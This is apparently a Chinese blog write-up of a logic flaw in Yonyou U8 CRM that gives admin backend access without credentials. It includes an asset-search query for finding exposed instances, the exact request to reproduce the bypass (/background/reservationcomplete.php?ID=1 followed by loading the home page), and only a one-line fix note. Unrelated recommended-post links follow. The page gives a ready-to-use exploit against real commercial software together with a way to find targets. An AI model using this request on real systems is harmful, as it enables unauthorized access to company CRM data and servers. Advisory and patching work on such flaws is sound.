用友CRM reservationcomplete.php逻辑漏洞登录后台

产品简介

用友CRM(Customer Relationship Management,客户关系管理)是由用友公司开发的一款软件,专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管理、销售管理、市场营销、客户服务和技术支持等功能。用友CRM的目标是帮助企业改善与客户的关系,提升客户满意度,优化销售和服务流程,从而提高企业的市场竞争力。它适用于各种规模的企业,可以根据不同企业的具体需求进行定制和扩展。

资产测绘

title=="用友U8CRM"

漏洞概述

用友CRM系统在reservationcomplete.php接口处存在逻辑漏洞,攻击者可通过该漏洞直接进去后台,获取后台权限,为后续获取服务器权限做准备。

漏洞复现

访问url:/background/reservationcomplete.php?ID=1

访问后,直接访问主页进入后台

修复建议

升级至最新安全版本

相关推荐
xiaoshuaishuai86 分钟前
C# AI实现PR处理、单元测试
开发语言·c#·log4j
C++、Java和Python的菜鸟7 分钟前
第7章 Java高级技术
java·开发语言
LONGZHIQIN9 分钟前
C#基础复习笔记
开发语言·笔记·c#
云水一下23 分钟前
DVWA从入门到精通(十七):Open HTTP Redirect(开放重定向)
web安全·dvwa·开放重定向
可靠的仙人掌23 分钟前
SAC(Soft Actor-Critic)算法底座
开发语言·算法·php
学逆向的1 小时前
汇编——数据存储模式
开发语言·汇编·网络安全
geovindu1 小时前
CSharp: Prototype Pattern
开发语言·后端·设计模式·.net·原型模式·创建型模式
技术不好的崎鸣同学1 小时前
Windows 命令提示符(CMD)恶意脚本分析篇
网络·windows·安全·系统安全
天天进步20152 小时前
Python全栈项目--校园食堂点餐与推荐系统
开发语言·python
aaPIXa6222 小时前
C++模板元编程:编译期计算Fibonacci数列
java·开发语言·c++